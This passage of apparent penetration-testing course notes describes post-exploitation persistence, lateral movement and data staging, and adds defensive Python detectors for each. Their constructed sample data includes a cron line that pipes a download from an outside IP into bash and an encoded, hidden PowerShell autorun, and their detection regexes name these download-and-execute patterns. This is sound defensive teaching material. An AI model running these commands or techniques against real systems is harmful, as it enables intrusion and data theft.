Once the PenTest-er has gained access to the targets, the next step is to establish persistence. This means setting up a way to quickly and easily reconnect to the system later if needed. This could involve installing a backdoor, adding a user account with the right credentials, or using other techniques.
These methods allow the PenTest-er to move through the network, maintain access across multiple machines, and safely exfiltrate data without being detected. After completing the engagement, the PenTest-er will remove any traces of their activity to clean up the systems.
<aside>
Mission Objectives
- Create a Backdoor with Metasploit
- Configure Reverse and Bind Shells
- Establish Persistence and Other Post-Exploitation Activities
- Scan for Open Ports from a Remote Computer
- Perform Enumeration of MSSQL with Metasploit
- Perform a Scan using Zenmap
- Bypass Windows Firewall
- Hide File with OpenStego
- Stage and Exfiltrate Using ADS
</aside>
1. Establish and Maintain Persistence
Gaining access is difficult; keeping it shouldn't be. Persistence ensures that if a system reboots or a user logs off, the tester doesn't lose their shell.
- Registry Auto-Run Keys: Modifying Windows Registry keys (e.g., HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run) to execute a payload on startup.
- Scheduled Tasks & Cron Jobs: Creating automated tasks in Windows (Task Scheduler) or Linux (crontab) to "call home" at specific intervals.
- New User Creation: Adding a hidden administrative user or adding a compromised user to a high-privilege group (e.g., "Domain Admins" or "wheel").
- Web Shells: Leaving a script (PHP, ASPX, JSP) on a web server to maintain command execution via the browser.
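Every foothold in the list above is also a hunting lead for the blue team. The script below is an added example (not from these notes) of a lightweight persistence hunt: it scores Run-key values and crontab lines for the traits the list describes. The entries, the interpreter and path patterns, and the threshold are all constructed assumptions for illustration, not a vendor rule set.

```python
"""Added example: score Windows Run-key values and Linux cron lines for
persistence indicators. All sample entries are constructed; the regexes and
weights are illustrative assumptions, not an authoritative detection rule."""
import re

# Constructed sample data: (value name, command) pairs as collected from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run on a workstation.
RUN_KEY_ENTRIES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Updater", r"powershell.exe -nop -w hidden -enc QQBBAEEA"),   # constructed encoded blob
    ("svchost", r"C:\Users\alice\AppData\Local\Temp\svchost.exe"),
]

# Constructed sample crontab lines from a Linux host.
CRON_LINES = [
    "0 2 * * * /usr/bin/apt-get update",
    "*/5 * * * * curl -s http://203.0.113.10/x.sh | bash",
    "@reboot /tmp/.cache/run.sh",
]

# Heuristics (assumed weights): script hosts, encoded/hidden flags,
# user-writable drop directories and names that mimic system binaries.
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b", re.I)
ENCODED_OR_HIDDEN = re.compile(
    r"(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b)", re.I)
WRITABLE_DIR = re.compile(r"\\(Temp|Downloads|Public|ProgramData)\\", re.I)
SYSTEM_NAMES = {"svchost", "lsass", "csrss", "winlogon", "explorer"}
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")
TEMP_OR_HIDDEN = re.compile(r"(^|\s)(/tmp/|/dev/shm/|/var/tmp/)|/\.[^/\s]+/")
THRESHOLD = 3   # assumed cut-off: at or above this the entry is reported


def score_run_entry(name, command):
    """Return (score, reasons) for one Run-key value."""
    score, reasons = 0, []
    if INTERPRETERS.search(command):
        score += 2; reasons.append("script interpreter as autorun target")
    if ENCODED_OR_HIDDEN.search(command):
        score += 3; reasons.append("encoded command or hidden window flags")
    if WRITABLE_DIR.search(command):
        score += 2; reasons.append("binary in user-writable directory")
    if name.lower() in SYSTEM_NAMES:
        score += 2; reasons.append("value name masquerades as a system binary")
    return score, reasons


def score_cron_line(line):
    """Return (score, reasons) for one crontab line."""
    score, reasons = 0, []
    if DOWNLOAD_EXEC.search(line):
        score += 3; reasons.append("download piped straight into a shell")
    if TEMP_OR_HIDDEN.search(line):
        score += 2; reasons.append("script in temp or hidden directory")
    if line.lstrip().startswith("@reboot"):
        score += 1; reasons.append("@reboot trigger (survives restarts)")
    return score, reasons


def hunt(run_entries=RUN_KEY_ENTRIES, cron_lines=CRON_LINES):
    """Map each entry that meets THRESHOLD to the reasons it was flagged."""
    findings = {}
    for name, cmd in run_entries:
        score, why = score_run_entry(name, cmd)
        if score >= THRESHOLD:
            findings[f"Run:{name}"] = why
    for line in cron_lines:
        score, why = score_cron_line(line)
        if score >= THRESHOLD:
            findings[f"cron:{line}"] = why
    return findings


if __name__ == "__main__":
    for key, reasons in hunt().items():
        print(f"{key}\n    " + "; ".join(reasons))
```

The OneDrive entry scores zero even though it lives under AppData, because nothing else about it is odd; the point of weighting several weak signals is to avoid paging on every legitimate autorun. In practice the same scoring would run over a full export of Run/RunOnce keys, scheduled-task XML and every user's crontab, with a per-host baseline to suppress entries that have been present unchanged for weeks.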
2. Move Laterally through Environments
Once a single host is compromised, the tester "pivots" to other systems to find the organization's "Crown Jewels."
- Pivoting & Tunneling: Using a compromised host as a proxy to reach internal segments that are not directly accessible from the internet.
- Pass-the-Hash (PtH) & Pass-the-Ticket (PtT): Using captured NTLM hashes or Kerberos tickets to authenticate to other servers without needing cleartext passwords.
- SSH Port Forwarding: Creating tunnels through SSH to map internal ports to a local machine.
- Living off the Land (LotL): Using native tools like PsExec, SSH, or RDP to move between machines, as these tools are often ignored by security software.
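Pass-the-Hash and LotL movement leave a recognisable trail: one account authenticating with NTLM to many hosts in a short burst. The following is an added example (not from these notes) of that detection over constructed logon records modelled on a subset of the fields in Windows Security event 4624 (LogonType, AuthenticationPackageName, IpAddress, TargetUserName); the Computer field here stands for the host that recorded the event, and the window, host count and allowlist are assumed tuning values.

```python
"""Added example: flag NTLM network-logon fan-out, a common Pass-the-Hash and
lateral-movement pattern. Events are constructed and carry only a subset of
real 4624 fields; thresholds are illustrative assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. Each dict is one 4624 "successful logon" record
# as seen on the host named in "Computer".
EVENTS = [
    {"TimeCreated": "2024-05-01T09:00:05", "Computer": "FS01", "TargetUserName": "alice",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.1.20"},
    {"TimeCreated": "2024-05-01T09:00:09", "Computer": "PRINT01", "TargetUserName": "alice",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.1.20"},
    {"TimeCreated": "2024-05-01T09:01:00", "Computer": "FS01", "TargetUserName": "WS22$",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.1.22"},
    {"TimeCreated": "2024-05-01T09:10:01", "Computer": "FS01", "TargetUserName": "svc_backup",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.1.50"},
    {"TimeCreated": "2024-05-01T09:10:02", "Computer": "DB01", "TargetUserName": "svc_backup",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.1.50"},
    {"TimeCreated": "2024-05-01T09:10:03", "Computer": "WEB01", "TargetUserName": "svc_backup",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.1.50"},
    {"TimeCreated": "2024-05-01T09:10:04", "Computer": "DC01", "TargetUserName": "svc_backup",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.1.50"},
    {"TimeCreated": "2024-05-01T11:30:00", "Computer": "FS01", "TargetUserName": "bob",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.1.31"},
    {"TimeCreated": "2024-05-01T14:00:00", "Computer": "DB01", "TargetUserName": "bob",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.1.31"},
]


def detect_ntlm_fanout(events, window=timedelta(minutes=5), min_hosts=3,
                       allowlist=frozenset()):
    """Return one alert per (user, source IP) that reached >= min_hosts distinct
    hosts via NTLM network logons (type 3) inside any `window`-long span.

    Machine accounts (name ending in '$') and allowlisted users such as
    vulnerability scanners are skipped because they fan out legitimately.
    """
    groups = defaultdict(list)
    for e in events:
        if e["LogonType"] != 3 or e["AuthenticationPackageName"] != "NTLM":
            continue
        user = e["TargetUserName"]
        if user.endswith("$") or user in allowlist:
            continue
        groups[(user, e["IpAddress"])].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["Computer"]))

    alerts = []
    for (user, ip), logons in groups.items():
        logons.sort()
        best = set()
        # Slide a window anchored at each logon and keep the widest host set.
        for i, (t0, _) in enumerate(logons):
            hosts = {host for t, host in logons[i:] if t - t0 <= window}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            alerts.append({"user": user, "source_ip": ip, "hosts": sorted(best)})
    return alerts


if __name__ == "__main__":
    for a in detect_ntlm_fanout(EVENTS):
        print(f"{a['user']} from {a['source_ip']} -> {', '.join(a['hosts'])}")
```

Only svc_backup trips the rule: alice uses Kerberos, WS22$ is a machine account, and bob's two NTLM logons are hours apart. The same fan-out shape appears when an administrator runs PsExec in a loop, which is why the allowlist and a baseline of "who normally talks to how many hosts" matter more than the raw threshold; enforcing Kerberos and disabling NTLM where possible shrinks the noise further.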
3. Staging and Exfiltration
This is where the "Impact" is proven. It simulates a data breach by preparing and removing sensitive information.
- Data Staging: Gathering sensitive files (spreadsheets, databases, configuration files) into a single, hidden directory on a compromised host.
- Compression & Encryption: Using tools like 7-Zip or tar to bundle data and encrypt it to bypass Data Loss Prevention (DLP) systems.
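Once the bundle is encrypted, a DLP engine that inspects content sees only noise, so the defensive signal has to come from behaviour: many sensitive files landing in one odd directory in a short span, followed by an archive appearing in the same place. The script below is an added example (not from these notes) of that staging detection over constructed file-creation telemetry; the extensions, path hints, window and file count are assumptions chosen for illustration.

```python
"""Added example: detect data-staging behaviour from file-creation telemetry.
Events are constructed to look like EDR/Sysmon-style file-create records;
extension lists, path hints and thresholds are illustrative assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed sample events: (timestamp, host, full path, size in bytes).
FILE_EVENTS = [
    ("2024-05-01T10:00:00", "WS22", r"C:\Users\alice\Documents\budget.xlsx", 80_000),
    ("2024-05-01T13:02:10", "WS22", r"C:\Users\alice\AppData\Local\Temp\.cache\hr_salaries.xlsx", 120_000),
    ("2024-05-01T13:02:15", "WS22", r"C:\Users\alice\AppData\Local\Temp\.cache\customers.sql", 9_000_000),
    ("2024-05-01T13:02:20", "WS22", r"C:\Users\alice\AppData\Local\Temp\.cache\web.config", 4_000),
    ("2024-05-01T13:02:25", "WS22", r"C:\Users\alice\AppData\Local\Temp\.cache\passwords.kdbx", 30_000),
    ("2024-05-01T13:05:00", "WS22", r"C:\Users\alice\AppData\Local\Temp\.cache\backup.7z", 6_500_000),
    ("2024-05-01T15:00:00", "FS01", r"D:\Backups\nightly-2024-05-01.7z", 900_000_000),
]

# Assumed indicator lists. SENSITIVE_EXT is what an attacker typically gathers;
# ARCHIVE_EXT is the output of 7-Zip/tar-style bundling (tar.gz ends in .gz).
SENSITIVE_EXT = {".xlsx", ".docx", ".sql", ".config", ".kdbx", ".pst", ".csv"}
ARCHIVE_EXT = {".7z", ".zip", ".rar", ".gz", ".tgz"}
# Directory fragments (lower-cased, with trailing backslash) typical of staging.
STAGING_HINTS = ("\\temp\\", "\\public\\", "\\$recycle.bin\\", "\\.")


def find_staging(events=FILE_EVENTS, window=timedelta(minutes=10), min_files=3):
    """Report directories where >= min_files distinct sensitive files were
    created within `window`, plus whether an archive appeared there in the
    same span and whether the path itself looks like a drop location."""
    by_dir = defaultdict(list)
    for ts, host, path, size in events:
        p = PureWindowsPath(path)
        by_dir[(host, str(p.parent))].append(
            (datetime.fromisoformat(ts), p.name, p.suffix.lower(), size))

    findings = []
    for (host, directory), items in by_dir.items():
        items.sort()
        for i, (t0, *_) in enumerate(items):
            in_win = [it for it in items[i:] if it[0] - t0 <= window]
            sensitive = {name for _, name, ext, _ in in_win if ext in SENSITIVE_EXT}
            if len(sensitive) < min_files:
                continue
            archives = [name for _, name, ext, _ in in_win if ext in ARCHIVE_EXT]
            findings.append({
                "host": host,
                "dir": directory,
                "sensitive_files": len(sensitive),
                "archive": archives[0] if archives else None,
                "staging_path": any(h in directory.lower() + "\\" for h in STAGING_HINTS),
                "bytes": sum(sz for *_, sz in in_win),
            })
            break   # one finding per directory is enough for triage
    return findings


if __name__ == "__main__":
    for f in find_staging():
        print(f"{f['host']} {f['dir']}: {f['sensitive_files']} sensitive files, "
              f"archive={f['archive']}, staging_path={f['staging_path']}, {f['bytes']} bytes")
```

The nightly backup on FS01 is not reported: an archive on its own, in a directory with no sensitive-file burst, is just a backup. Pairing the finding's byte count with outbound network volume from the same host over the following hour turns this from a staging alert into an exfiltration alert, which is the last step the notes describe.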